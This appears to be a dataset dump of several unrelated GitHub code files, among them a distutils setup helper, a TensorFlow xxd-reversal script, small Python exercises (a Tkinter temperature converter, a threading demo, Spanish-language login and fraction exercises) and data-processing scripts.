(requires coverage.py)\"),\n ]\n\n def initialize_options(self):\n self.tests = None\n self.print_only = False\n self.coverage = False\n\n def finalize_options(self):\n if self.tests is not None:\n self.tests = self.tests.split(',')\n\n def run(self):\n build_obj = self.get_finalized_command('build')\n build_obj.run()\n sys.path.insert(0, build_obj.build_lib)\n try:\n mod = __import__(self.distribution.test_module)\n main = getattr(mod, 'main')\n main(\n test_names = self.tests,\n print_only = self.print_only,\n coverage = self.coverage,\n )\n finally:\n sys.path.remove(build_obj.build_lib)\n\n\nDistribution.test_module = 'tests'\n\n\n###\n\n\nclass clean(_clean):\n user_options = _clean.user_options + [\n ('build-man=', None, 'manpage build directory'),\n ]\n\n def initialize_options(self):\n _clean.initialize_options(self)\n self.build_man = None\n\n def finalize_options(self):\n _clean.finalize_options(self)\n self.set_undefined_options('build_man', ('build_dir', 'build_man'))\n\n def run(self):\n if self.all:\n if os.path.exists(self.build_man):\n remove_tree(self.build_man, dry_run = self.dry_run)\n else:\n log.debug(\n \"'%s' does not exist -- can't clean it\",\n self.build_man,\n )\n\n _clean.run(self)\n\n\n###\n\n\nclass build_man(Command):\n user_options = _install_data.user_options + [\n ('build-dir=', 'b', 'manpage build directory'),\n ]\n description = 'Build manual pages from docbook XML.'\n\n xsltproc = ['xsltproc', '--nonet', '--novalid', '--xinclude']\n\n def initialize_options(self):\n self.build_base = None\n self.build_dir = None\n\n def finalize_options(self):\n self.set_undefined_options('build', ('build_base', 'build_base'))\n if self.build_dir is None:\n self.build_dir = os.path.join(self.build_base, 'man')\n self.docbook_files = []\n if self.distribution.manpage_sources is not None:\n unclaimed_files = list(self.distribution.manpage_sources)\n for index, filename in enumerate(list(unclaimed_files)):\n if filename.endswith('.xml'):\n self.docbook_files.append(os.path.abspath(filename))\n del unclaimed_files[index]\n if unclaimed_files:\n log.error(\n 'unknown manpage source file types: %s',\n ', '.join(unclaimed_files),\n )\n raise 
SystemExit(1)\n\n def _find_docbook_manpage_stylesheet(self):\n from libxml2 import catalogResolveURI\n return catalogResolveURI(\n 'http://docbook.sourceforge.net/release/xsl/current/manpages/docbook.xsl'\n )\n\n def build_manpage_from_docbook(self, stylesheet, docbook_file):\n if stylesheet is None:\n raise AssertionError('stylesheet is None')\n\n command = self.xsltproc + [stylesheet, docbook_file]\n orig_wd = os.getcwd()\n os.chdir(self.build_dir)\n try:\n spawn(command, dry_run = self.dry_run)\n finally:\n os.chdir(orig_wd)\n\n def run(self):\n if self.docbook_files:\n stylesheet = self._find_docbook_manpage_stylesheet()\n\n if stylesheet is None:\n log.warn(\n 'Warning: missing docbook XSL stylesheets; '\n 'manpages will not be built.\\n'\n 'Please install the docbook XSL stylesheets from '\n 'http://docbook.org/.'\n )\n\n else:\n if not self.dry_run:\n if not os.path.exists(self.build_dir):\n os.mkdir(self.build_dir)\n for docbook_file in self.docbook_files:\n log.info('building manpage from docbook: %s', docbook_file)\n if not self.dry_run:\n self.build_manpage_from_docbook(\n stylesheet,\n docbook_file,\n )\n\nDistribution.manpage_sources = None\n\nbuild.sub_commands.append((\n 'build_man',\n (lambda self: bool(self.distribution.manpage_sources)),\n))\n\n\nclass install_man(_install_data):\n def initialize_options(self):\n _install_data.initialize_options(self)\n self.build_dir = None\n\n def finalize_options(self):\n _install_data.finalize_options(self)\n self.set_undefined_options('build_man', ('build_dir', 'build_dir'))\n\n self.data_files = []\n\n if os.path.exists(self.build_dir):\n for entry in os.listdir(self.build_dir):\n path = os.path.join(self.build_dir, entry)\n if os.path.isfile(path):\n base, ext = os.path.splitext(entry)\n section = int(ext[1:])\n self.data_files.append(\n ('share/man/man%u' % section, [path])\n )\n\ninstall.sub_commands.append((\n 'install_man',\n (lambda self: bool(self.distribution.manpage_sources)),\n))\n\n\n###\n\n\nclass _DistinfoMixin:\n def _split_distinfo_module(self):\n parts = self.distribution.distinfo_module.split('.')\n return parts[:-1], parts[-1]\n\n def _prepare_distinfo_string(self, value):\n #if isinstance(value, str):\n # value = unicode(value)\n #return unicode(repr(value)).encode('utf-8')r\n return value\n\n def _write_distinfo_module(self, outfile, distinfo = (), imports = ()):\n distinfo = list(distinfo)\n imports = list(imports)\n\n distinfo.insert(\n 0,\n (\n 'version',\n self._prepare_distinfo_string(self.distribution.metadata.version),\n ),\n )\n\n log.info(\"creating distinfo file %r:\", outfile)\n for k, v in distinfo:\n log.info(' %s = %s', k, v)\n\n if not self.dry_run:\n with open(outfile, 'wb') as f:\n f.write(b'# coding: utf-8\\n')\n f.write(b'\\n')\n for modname in imports:\n f.write(b'import %s\\n' % modname)\n if imports:\n f.write(b'\\n')\n for k, v in distinfo:\n line = '%s = \"%s\"\\n' % (k, v)\n f.write(line.encode('utf8'))\n\n\n###\n\n\nclass install_data(_install_data):\n user_options = _install_data.user_options + [\n (\n 'install-dir-arch=',\n None,\n 'base directory for installing architecture-dependent data files',\n ),\n (\n 'install-dir-arch-pkg=',\n None,\n 'package-specific directory for installing architecture-dependent data files',\n ),\n (\n 'install-dir-indep=',\n None,\n 'base directory for installing architecture-independent data files',\n ),\n (\n 'install-dir-indep-pkg=',\n None,\n 'package-specific directory for installing architecture-independent data files',\n ),\n ]\n\n def 
initialize_options(self):\n _install_data.initialize_options(self)\n\n self.install_dir_arch = None\n self.install_dir_arch_pkg = None\n self.install_dir_indep = None\n self.install_dir_indep_pkg = None\n\n self.data_files_arch = self.distribution.data_files_arch\n self.data_files_arch_pkg = self.distribution.data_files_arch_pkg\n self.data_files_indep = self.distribution.data_files_indep\n self.data_files_indep_pkg = self.distribution.data_files_indep_pkg\n\n def _get_relative_install_dir(self, p):\n return p[len(self.install_dir) + len(os.sep):]\n\n def finalize_options(self):\n _install_data.finalize_options(self)\n\n py2exe_obj = self.distribution.get_command_obj('py2exe', False)\n if py2exe_obj is not None:\n py2exe_obj.ensure_finalized()\n\n if (py2exe_obj is not None) and (\n self.install_dir == py2exe_obj.dist_dir\n ):\n self.install_dir_arch = self.install_dir\n self.install_dir_arch_pkg = self.install_dir\n self.install_dir_indep = self.install_dir\n self.install_dir_indep_pkg = self.install_dir\n\n else:\n if self.install_dir_arch is None:\n if sys.platform == 'win32':\n self.install_dir_arch = self.install_dir\n else:\n self.install_dir_arch = os.path.join(self.install_dir, 'lib')\n\n if self.install_dir_arch_pkg is None:\n self.install_dir_arch_pkg = os.path.join(\n self.install_dir_arch,\n self.distribution.metadata.name,\n )\n\n if self.install_dir_indep is None:\n if sys.platform == 'win32':\n self.install_dir_indep = self.install_dir\n else:\n self.install_dir_indep = os.path.join(self.install_dir, 'share')\n\n if self.install_dir_indep_pkg is None:\n self.install_dir_indep_pkg = os.path.join(\n self.install_dir_indep,\n self.distribution.metadata.name,\n )\n\n if self.data_files is None:\n self.data_files = []\n\n if self.data_files_arch:\n self.data_files.extend(self._gen_data_files(\n self._get_relative_install_dir(self.install_dir_arch),\n self.data_files_arch,\n ))\n\n if self.data_files_arch_pkg:\n self.data_files.extend(self._gen_data_files(\n self._get_relative_install_dir(self.install_dir_arch_pkg),\n self.data_files_arch_pkg,\n ))\n\n if self.data_files_indep:\n self.data_files.extend(self._gen_data_files(\n self._get_relative_install_dir(self.install_dir_indep),\n self.data_files_indep,\n ))\n\n if self.data_files_indep_pkg:\n self.data_files.extend(self._gen_data_files(\n self._get_relative_install_dir(self.install_dir_indep_pkg),\n self.data_files_indep_pkg,\n ))\n\n def _gen_data_files(self, base_dir, data_files):\n for arg in data_files:\n if isinstance(arg, basestring):\n yield (base_dir, [arg])\n else:\n subdir, filenames = arg\n yield (os.path.join(base_dir, subdir), filenames)\n\n\nDistribution.data_files_arch = None\nDistribution.data_files_arch_pkg = None\nDistribution.data_files_indep = None\nDistribution.data_files_indep_pkg = None\n\n\norig_has_data_files = Distribution.has_data_files\n\ndef has_data_files(self):\n if orig_has_data_files(self):\n return True\n return any([\n self.data_files_arch,\n self.data_files_arch_pkg,\n self.data_files_indep,\n self.data_files_indep_pkg,\n ])\n\nDistribution.has_data_files = has_data_files\n\n\n###\n\n\nclass install_lib(_DistinfoMixin, _install_lib):\n def initialize_options(self):\n _install_lib.initialize_options(self)\n\n self.distinfo_package = None\n self.distinfo_module = None\n\n def finalize_options(self):\n _install_lib.finalize_options(self)\n\n if self.distribution.distinfo_module is not None:\n self.distinfo_package, self.distinfo_module = \\\n self._split_distinfo_module()\n\n def 
install(self):\n retval = _install_lib.install(self)\n\n if retval is None:\n return retval\n\n py2exe_obj = self.distribution.get_command_obj('py2exe', False)\n\n if (py2exe_obj is None) and (self.distinfo_package is not None):\n parts = [self.install_dir]\n parts.extend(self.distinfo_package)\n parts.append('%s.py' % self.distinfo_module)\n installed_module_path = os.path.join(*parts)\n\n install_obj = self.get_finalized_command('install')\n install_data_obj = self.get_finalized_command('install_data')\n\n distinfo = [\n (\n 'install_base',\n self._prepare_distinfo_string(os.path.abspath(\n install_obj.install_base,\n )),\n ),\n (\n 'install_platbase',\n self._prepare_distinfo_string(os.path.abspath(\n install_obj.install_platbase,\n )),\n ),\n (\n 'install_purelib',\n self._prepare_distinfo_string(os.path.abspath(\n install_obj.install_purelib,\n )),\n ),\n (\n 'install_platlib',\n self._prepare_distinfo_string(os.path.abspath(\n install_obj.install_platlib,\n )),\n ),\n (\n 'install_lib',\n self._prepare_distinfo_string(os.path.abspath(\n install_obj.install_lib,\n )),\n ),\n (\n 'install_headers',\n self._prepare_distinfo_string(os.path.abspath(\n install_obj.install_headers,\n )),\n ),\n (\n 'install_scripts',\n self._prepare_distinfo_string(os.path.abspath(\n install_obj.install_scripts,\n )),\n ),\n (\n 'install_data',\n self._prepare_distinfo_string(os.path.abspath(\n install_data_obj.install_dir,\n )),\n ),\n (\n 'install_data_arch',\n self._prepare_distinfo_string(os.path.abspath(\n install_data_obj.install_dir_arch,\n )),\n ),\n (\n 'install_data_arch_pkg',\n self._prepare_distinfo_string(os.path.abspath(\n install_data_obj.install_dir_arch_pkg,\n )),\n ),\n (\n 'install_data_indep',\n self._prepare_distinfo_string(os.path.abspath(\n install_data_obj.install_dir_indep,\n )),\n ),\n (\n 'install_data_indep_pkg',\n self._prepare_distinfo_string(os.path.abspath(\n install_data_obj.install_dir_indep_pkg,\n )),\n ),\n ]\n\n self._write_distinfo_module(installed_module_path, distinfo)\n\n retval.append(installed_module_path)\n\n return retval\n\n\nif _py2exe is None:\n py2exe = None\nelse:\n class py2exe(_DistinfoMixin, _py2exe):\n def make_lib_archive(self, *args, **kwargs):\n if self.distribution.distinfo_module is not None:\n imports = ['os', 'sys']\n distinfo = [\n (\n 'install_data',\n 'os.path.dirname(sys.executable)',\n ),\n (\n 'install_data_arch',\n 'os.path.dirname(sys.executable)',\n ),\n (\n 'install_data_arch_pkg',\n 'os.path.dirname(sys.executable)',\n ),\n (\n 'install_data_indep',\n 'os.path.dirname(sys.executable)',\n ),\n (\n 'install_data_indep_pkg',\n 'os.path.dirname(sys.executable)',\n ),\n ]\n\n tmp_dir_path = mkdtemp()\n try:\n distinfo_package, distinfo_module = self._split_distinfo_module()\n tmp_file_parent_path = os.path.join(\n tmp_dir_path,\n *distinfo_package\n )\n os.makedirs(tmp_file_parent_path)\n tmp_file_path = os.path.join(\n tmp_file_parent_path,\n ('%s.py' % distinfo_module),\n )\n self._write_distinfo_module(tmp_file_path, distinfo, imports)\n sys.path.insert(0, tmp_dir_path)\n try:\n self._distinfo_compiled_files = byte_compile(\n [Module(\n name = self.distribution.distinfo_module,\n file = tmp_file_path,\n )],\n target_dir = self.collect_dir,\n optimize = self.optimize,\n force = 0,\n verbose = self.verbose,\n dry_run = self.dry_run,\n )\n finally:\n del sys.path[0]\n finally:\n shutil.rmtree(tmp_dir_path)\n\n self.compiled_files.extend(self._distinfo_compiled_files)\n\n return _py2exe.make_lib_archive(self, *args, 
**kwargs)\n\n\nDistribution.distinfo_module = None\n\n\n###\n\n\ndef setup(*args, **kwargs):\n    cmdclass = kwargs.setdefault('cmdclass', {})\n    kwargs['cmdclass'].setdefault('test', test)\n    kwargs['cmdclass'].setdefault('install_data', install_data)\n    kwargs['cmdclass'].setdefault('install_lib', install_lib)\n    kwargs['cmdclass'].setdefault('build_man', build_man)\n    kwargs['cmdclass'].setdefault('install_man', install_man)\n    kwargs['cmdclass'].setdefault('clean', clean)\n    if py2exe is not None:\n        kwargs['cmdclass'].setdefault('py2exe', py2exe)\n    return _setup(*args, **kwargs)\n","repo_name":"dsuch/zato-ext-inotifyx","sub_path":"setuplib.py","file_name":"setuplib.py","file_ext":"py","file_size_in_byte":18835,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"3999460064","text":"r\"\"\"Reverses xxd dump, i.e, converts a C++ source file back to a TFLite file.\n\nThis script is used to convert a model from a C++ source file (dumped with xxd)\nback to it's original TFLite file format in order to analyze it with either a\nmodel visualizer like Netron (https://github.com/lutzroeder/netron) or to\nevaluate the model using the Python TensorFlow Lite Interpreter API.\n\nThe xxd command to dump the TFLite file to a C++ source file looks like:\nxxd -i model_data.tflite > model_data.cc\n\n\"\"\"\nfrom absl import app\nfrom absl import flags\n\nfrom tensorflow.lite.tools import flatbuffer_utils\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_string('input_cc_file', None,\n                    'Full path name to the input C++ source file.')\nflags.DEFINE_string('output_tflite_file', None,\n                    'Full path name to the output TFLite file.')\n\nflags.mark_flag_as_required('input_cc_file')\nflags.mark_flag_as_required('output_tflite_file')\n\n\ndef main(_):\n  model = flatbuffer_utils.xxd_output_to_object(FLAGS.input_cc_file)\n  flatbuffer_utils.write_model(model, FLAGS.output_tflite_file)\n\n\nif __name__ == '__main__':\n  app.run(main)\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/lite/tools/reverse_xxd_dump_from_cc.py","file_name":"reverse_xxd_dump_from_cc.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"} +{"seq_id":"22636651719","text":"# Campsite => within any block of P consecutive days, only L days can be used\n# V-day vacation\nimport sys\ncase = 1\nanswer = [] \nwhile True :\n    l, p, v = map(int,sys.stdin.readline().split())\n    if l == 0 and p == 0 and v == 0 :\n        break\n    temp = v // p\n    result = temp * l + min(v % p, l)\n    answer.append([\"Case \" + str(case) +': ' + str(result)])\n    case += 1\n\nfor ans in answer:\n    print(''.join(ans))","repo_name":"jooyun-1/PS_repo","sub_path":"Practice/baek4796.py","file_name":"baek4796.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13721905544","text":"import threading\nimport time\nimport logging\n\n\ndef tfunc(value):\n    i = 0\n    print(\"Start\")\n    #while True:\n    time.sleep(5)\n    print(\"Value: \", i)\n    i += 1\n\ndef main():\n    print(\"Hello\")\n    format = \"%(asctime)s: %(message)s\"\n    logging.basicConfig(format=format, level=logging.INFO, datefmt=\"%H:%M:%S\")\n    logging.info(\"Main : before creating thread\")\n    x = threading.Thread(target=tfunc, args=(34, ))\n    x.daemon = True\n    x.start()\n    logging.info(\"Main : wait\")\n    #x.join()\n    logging.info(\"Main : ready\")\n    \n\n\nif __name__ == \"__main__\":\n    
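    # Caveat: x is a daemon thread and x.join() is commented out above, so main() can return (and the process exit) before tfunc finishes its 5-second sleep, in which case "Value: 0" is never printed; re-enable x.join() to wait for the worker.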
main()","repo_name":"floggy22/initscript","sub_path":"versuche/app/thread.py","file_name":"thread.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7075682295","text":"import typing as tp\n\nfrom .base import Operation, TRow, TRowsGenerator\n\n\n__all__ = [\n    'Read',\n    'ReadIterFactory'\n]\n\n\nclass Read(Operation):\n    \"\"\"Generator of parsed rows from file\"\"\"\n\n    def __init__(self, filename: str, parser: tp.Callable[[str], TRow]) -> None:\n        \"\"\"\n        :param filename: File to read from\n        :param parser: Parser used to make TRow from string\n        \"\"\"\n        self.filename = filename\n        self.parser = parser\n\n    def __call__(self, *args: tp.Any, **kwargs: tp.Any) -> TRowsGenerator:\n        with open(self.filename) as f:\n            for line in f:\n                yield self.parser(line)\n\n\nclass ReadIterFactory(Operation):\n    \"\"\"Generator of rows from key-word argument\"\"\"\n\n    def __init__(self, name: str) -> None:\n        \"\"\"\n        :param name: Key of argument\n        \"\"\"\n        self.name = name\n\n    def __call__(self, *args: tp.Any, **kwargs: tp.Any) -> TRowsGenerator:\n        for row in kwargs[self.name]():\n            yield row\n","repo_name":"Alexander4127/compgraph","sub_path":"compgraph/operations/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7575069864","text":"# to convert Celsius to Fahrenheit and vice versa using python\r\nfrom tkinter import*\r\n\r\nroot=Tk()\r\n\r\nvar1=DoubleVar()\r\n\r\nvar2=DoubleVar()\r\n\r\n\r\nlabel=Label(root,text='TEMPERATURE CONVERTER',font=('Arial',30))\r\n\r\nlabel.pack(side=TOP)\r\n\r\n# temperature in Celsius box\r\nlabel1=Label(root,text='Temperature in Celsius =',font=('Arial',25))\r\n\r\nlabel1.place(x=200,y=200)\r\n\r\n# temperature in Fahrenheit box\r\nlabel2=Label(root,text='Temperature in Fahrenheit =',font=('Arial',25))\r\n\r\nlabel2.place(x=200,y=300)\r\n\r\n\r\nentry1=Entry(root,font=('Arial',25),textvariable=var1)\r\n\r\nentry1.place(x=600,y=200)\r\n\r\n\r\nlabel3=Label(root,font=('Arial',25))\r\n\r\nlabel3.place(x=600,y=300)\r\n\r\ndef click1():\r\n\r\n    label3.config(text='' +str(var1.get() * 1.8 + 32)+ ' °F')\r\n\r\nbutton1=Button(root,text='Convert',font=('Arial',25),command=click1)\r\n\r\nbutton1.place(x=920,y=200)\r\n\r\n# temperature in Fahrenheit box\r\nlabel4=Label(root,text='Temperature in Fahrenheit =',font=('Arial',25))\r\n\r\nlabel4.place(x=200,y=400)\r\n# temperature in Celsius box\r\nlabel5=Label(root,text='Temperature in Celsius =',font=('Arial',25))\r\n\r\nlabel5.place(x=200,y=500)\r\n\r\n\r\nentry2=Entry(root,font=('Arial',25),textvariable=var2)\r\n\r\nentry2.place(x=600,y=400)\r\n\r\nlabel6=Label(root,font=('Arial',25))\r\nlabel6.place(x=600,y=500)\r\n\r\n# click button handler: convert Fahrenheit to Celsius\r\ndef click2():\r\n\r\n    label6.config(text='' +str((var2.get()-32)/1.8)+ ' °C')\r\n\r\nbutton2=Button(root,text='Convert',font=('Arial',25),command=click2)\r\n\r\nbutton2.place(x=920,y=400)\r\n\r\nroot.mainloop()\r\n","repo_name":"nidhijauhary/TemperatureConverter","sub_path":"Temprature Converter.py","file_name":"Temprature Converter.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"75267592999","text":"\n\nimport os\nfrom subprocess import Popen, PIPE\nfrom Bio import Entrez, SeqIO\nimport time\nimport numpy as np\nimport pandas as pd\n\n\n# Output from 
satellite analysis.\nacc_list = '/media/ngs/py_projects/sat3/GI.csv'\n\ndf = pd.read_csv(acc_list)\ngi_list=open('gi_list.csv', 'w+')\n# Get GIs as ints.\nI = []\nfor i, l in enumerate(df.GI):\n\n    I.append(int(l.strip(\"['\").strip(\"']\")))\n    gi_list.write( l.strip(\"['\").strip(\"']\") + \"\\n\")\n\ngi_list.close()\n\n# Output from satellite analysis.\ndat_file = '/media/ngs/py_projects/sat3/all_matches.dat'\n\ndf = pd.read_csv(dat_file, sep='\\t')\n#print(df)\n\n# Collect the transcript names.\nnames=df['transcript_name'].unique()\nacc_list=open('acc_list.csv','w+')\nfor i, l in enumerate(names):\n\n    acc_list.write( l + \"\\n\")\n\nacc_list.close()","repo_name":"jmfrank/sat3","sub_path":"output_acc.py","file_name":"output_acc.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71107267559","text":"from domino import Domino\nimport os\n\ndomino = Domino(f\"{os.environ['DOMINO_PROJECT_OWNER']}/{os.environ['DOMINO_PROJECT_NAME']}\")\n\n# Create domino datasets\n\n# Required Datasets & Descriptions\nREQUIRED = {\n    \"SDTMUNBLIND\": \"SDTMUNBLIND is created using RAW and UNBLIND\",\n    \"SDTMBLIND\": \"SDTMBLIND is created using RAW and DUMMY\",\n    \"METADATA\": \"Metadata file is copied by the SDTM project to the METADATA dataset and snapshotted with the study specific reference files.\"\n}\n\n# Existing Datasets\nCURRENT = set(d['datasetName'] for d in domino.datasets_list(project_id=os.environ[\"DOMINO_PROJECT_ID\"]))\n\n# For any required datasets which do not exist \nfor key in set(REQUIRED.keys()).difference(CURRENT):\n    # Make them\n    domino.datasets_create(key, REQUIRED[key])\n","repo_name":"dominodatalab/CDISC01_SDTM","sub_path":"utilities/init_datasets_sdtm.py","file_name":"init_datasets_sdtm.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"28691220239","text":"\"\"\"Users:\n1. Design a program that can store the username and password of\nup to 10 different users. If the user already exists in the system, they can\nlog in by entering a valid username and password, with a maximum of three\nattempts, after which their account is locked.\nIf the user does not exist, they can create an account as long as there is\nspace (maximum 10), for which they will be asked for a username and password,\nas well as confirmation of the latter.\nThe menu of this program will allow logging in and creating new accounts, as\nwell as showing all existing usernames without their passwords.\"\"\"\n\nbaseUsuarios={\"MIKI\":\"123123\"}\n\ndef menu(opcion):\n    pantalla=\"\"\"\n    1. Create user\n    2. Log into the system\n    3. Show menu\n    4. Show database\n    5. 
Exit\n    \"\"\"\n    salida=\"\"\n    if opcion==1:\n        print(\"Let's create a user\")\n        salida=1\n    elif opcion==2:\n        print(\"Let's log in\")\n        salida=2\n    elif opcion==3:\n        print(pantalla)\n    elif opcion==4:\n        print(\"Showing database\")\n        salida=4\n    elif opcion==5:\n        print(\"Closing program\")\n        quit()\n    else:\n        print(\"That option does not exist, enter 3 to see the menu\")\n    return salida\n\ndef crearUsuario(user, password, repeatpass,baseUsuarios=baseUsuarios):\n    valid=0\n    restrictions=\"1234567890!·$%&/()=?¿Çç*+^`¨´´';,.-_}{][|@#\\ºª¬ \"\n    if len(baseUsuarios)==10:\n        valid=0\n        print(\"The database is full\")\n    elif user[0] in restrictions:\n        valid=0\n        print(\"The username must start with an alphabetic character\")\n    elif len(password)< 6:\n        valid=0\n        print(\"The password must be at least 6 characters long\")\n    elif password!=repeatpass:\n        valid=0\n        print(\"The passwords do not match\")\n    else:\n        valid=baseUsuarios[user]=password\n\n    \n    return valid\n\ndef logear(usuario,password,base_datos=baseUsuarios):\n    valido=True\n    fallos=0\n    if base_datos.get(usuario)==\"Locked\":\n        print(\"The user is locked, contact your administrator\")\n    elif usuario in base_datos and base_datos.get(usuario)!=\"Locked\":\n        while password!=base_datos[usuario] and fallos <=3:\n            fallos+=1\n            password=input(f\"Enter the password again (attempt {fallos}/3): \")\n        if fallos >=3:\n            print(\"The user has been locked\")\n            base_datos[usuario]=\"Locked\"\n            valido=False\n        if valido==False:\n            return valido\n        if base_datos[usuario]==password:\n            print(\"Accessing the system\")\n            valido=True\n        \n    else:\n        print(\"The user does not exist\")\n        valido=False\n    return valido\n\ndef main():\n    try:\n        opcion=0\n        while opcion!=5:\n            opcion=int(input(\"Enter option: \"))\n            if opcion==1 and len(baseUsuarios) <10:\n                menu(1)\n                user=input(\"Enter desired username: \")\n                password=input(\"Enter password: \")\n                repeatpass=input(\"Repeat password: \")\n                if user in baseUsuarios:\n                    print(\"The user already exists in the system\")\n                    menu(2)\n                else:\n                    while crearUsuario(user,password,repeatpass)==0:\n                        user=input(\"Enter desired username: \")\n                        password=input(\"Enter password: \")\n                        repeatpass=input(\"Repeat password: \")\n                    \n\n            elif opcion==2:\n                menu(2)\n                logear(usuario=input(\"Enter username: \"), password=input(\"Enter password: \"))\n            elif opcion==4:\n                keys=\"\"\n                menu(4)\n                for i in baseUsuarios.keys():\n                    keys+=i+\" \"\n                print(keys)\n            else: menu(opcion)\n    except ValueError:\n        print(\"Enter 3 to see the menu\")\n    main()\n\nif __name__==\"__main__\":\n    \n    print(menu(3))\n    main()\n    \n\n    \n# CALCULATION\n\"\"\"1. Write a Python program to calculate the sum of digits of a number.\n\"\"\"\n\ndef sumarDigitos(numero):\n    numero=str(numero)\n    total=0\n    for n in numero:\n        total=total+int(n)\n\n    return total\n\nassert(sumarDigitos(2)==2)\nassert(sumarDigitos(25)==7)\n\n\"\"\"2. Write a Python program to compute the greatest common divisor (GCD) of two\npositive integers\"\"\"\n\ndef maximo_comun_divisor(numero1,numero2):\n    divisores1=[]\n    divisores2=[]\n    comunes=[]\n    for div1 in range(1,numero1+1):\n        if numero1%div1==0:\n            divisores1.append(div1)\n    for div2 in range(1,numero2+1):\n        if numero2%div2==0:\n            divisores2.append(div2)\n\n    for i in divisores1:\n        if i in divisores2:\n            comunes.append(i)\n\n    return comunes[-1]\n\n\nassert(maximo_comun_divisor(10,5)==5)\n\n\"\"\"3. 
Write a Python program to get the least common multiple (LCM) of two positive\nintegers.\n\"\"\"\n\ndef minimo_comun_multiplo(numero1,numero2):\n    mcm=(numero1*numero2)/maximo_comun_divisor(numero1,numero2)\n    return mcm\n\nassert(minimo_comun_multiplo(12,8)==24)\nassert(minimo_comun_multiplo(4,2)==4)\n\n\"\"\"4. Write a Python program that accepts two integers (n and i) and computes the value\nof n+nn+nnn+....\"\"\"\n\ndef sumar_patron(numero1, numero2):\n    # n + nn + nnn + ... : each term repeats the digits of n one more time\n    suma=0\n    for i in range(1,numero2+1):\n        suma+=int(str(numero1)*i)\n    return suma\n    \nassert(sumar_patron(2,3)==246)\nassert(sumar_patron(1,5)==12345)\n\n\"\"\"5. We want to create a program that works with fractions of the form a/b. To\nrepresent a fraction we will use two integers: numerator and denominator,\ncreating the following functions to work with them:\ni. leer_fracción: This function's task is to read the numerator and the\ndenominator from the keyboard and return the fraction simplified (For example,\ngiven 16/6 ⇒ 8/3)\nii. escribir_fracción: prints the fraction on screen; if the denominator is 1,\nonly the numerator is shown.\niii. calcular_mcd: This function receives two numbers and returns their greatest\ncommon divisor.\niv. simplificar_fracción: simplifies a fraction. To do so, divide the numerator\nand denominator by their GCD.\nv. sumar_fracciones: receives two fractions n1/d1 and n2/d2 and computes their\nsum. The sum of two fractions is another fraction whose numerator is\nn=n1*d2+d1*n2 and denominator d=d1*d2, simplifying the resulting fraction.\nvi. restar_fracciones: subtracts two fractions, the numerator of the difference\nbeing n=n1*d2-d1*n2 and the denominator d=d1*d2, simplifying the result.\nvii. multiplicar_fracciones: receives two fractions and computes their product,\nthe product's numerator being n=n1*n2 and the denominator d=d1*d2\n(simplifying).\nviii. 
dividir_fracciones: calcula el cociente de dos fracciones, siendo el numerador\nn=n1*d2 y denominador d=d1*n2 (simplificando el resultado).\n\"\"\"\n\ndef leer_fraccion(numerador,denominador):\n n=2\n while n <= min(numerador,denominador):\n if numerador%n==0 and denominador%n==0:\n numerador=numerador//n\n denominador=denominador//n\n else:\n n+=1\n return numerador,denominador\n\n\nassert(leer_fraccion(16,6)==(8,3))\n\ndef escribir_fraccion(numerador,denominador):\n if denominador==1:\n print(numerador)\n else:\n print(f\"{numerador}/{denominador}\")\n\nescribir_fraccion(2,5)\n\n\ndef simplificar_fraccion(numerador,denominador):\n mcd=maximo_comun_divisor(numerador,denominador)\n numeradorsimp=numerador//mcd\n denominadorsimp=denominador//mcd\n return numeradorsimp, denominadorsimp\n\nassert(simplificar_fraccion(8,4)==(2,1))\n\ndef sumar_fraccion(numerador1,denominador1,numerador2,denominador2):\n numerador=(numerador1*denominador2)+(denominador1*numerador2)\n denominador=denominador1*denominador2\n return simplificar_fraccion(numerador,denominador)\n\ndef restar_fraccion(numerador1,denominador1,numerador2,denominador2):\n numerador=(numerador1*denominador2)-(denominador1*numerador2)\n denominador=denominador1*denominador2\n return simplificar_fraccion(numerador,denominador)\n\ndef multiplicar_fraccion(numerador1,denominador1,numerador2,denominador2):\n numerador=numerador1*numerador2\n denominador=denominador1*denominador2\n return simplificar_fraccion(numerador,denominador)\n\ndef dividir_fraccion(numerador1,denominador1,numerador2,denominador2):\n numerador=numerador1*denominador2\n denominador=numerador2*denominador1\n return simplificar_fraccion(numerador,denominador)\n\n\"\"\"6. Crear un programa que utilizando las funciones anteriores muestre el siguiente\nmenú:\na. Sumar dos fracciones: En esta opción se piden dos fracciones y se muestra el\nresultado.\nb. Restar dos fracciones: En esta opción se piden dos fracciones y se muestra la\nresta.\nc. Multiplicar dos fracciones: En esta opción se piden dos fracciones y se muestra el\nproducto.\nd. Dividir dos fracciones: En esta opción se piden dos fracciones y se muestra el\ncociente.\ne. Salir\"\"\"\n\nopcion=\"\"\npantalla=\"\"\"\na. Sumar dos fracciones.\nb. Restar dos fracciones.\nc. Multiplicar dos fracciones.\nd. Dividir dos fracciones.\ne. Salir\"\"\"\nwhile opcion != \"e\":\n print(pantalla)\n\n opcion=input(\"Introduzca una opcion: \").lower()\n\n if opcion==\"a\":\n print(sumar_fraccion(int(input(\"Introduzca numerador1: \")),int(input(\"Introduzca denominador1: \")),int(input(\"Introduzca numerador2: \")),int(input(\"Introduzca denominador2: \"))))\n elif opcion==\"b\":\n print(restar_fraccion(int(input(\"Introduzca numerador1: \")),int(input(\"Introduzca denominador1: \")),int(input(\"Introduzca numerador2: \")),int(input(\"Introduzca denominador2: \"))))\n elif opcion==\"c\":\n print(multiplicar_fraccion(int(input(\"Introduzca 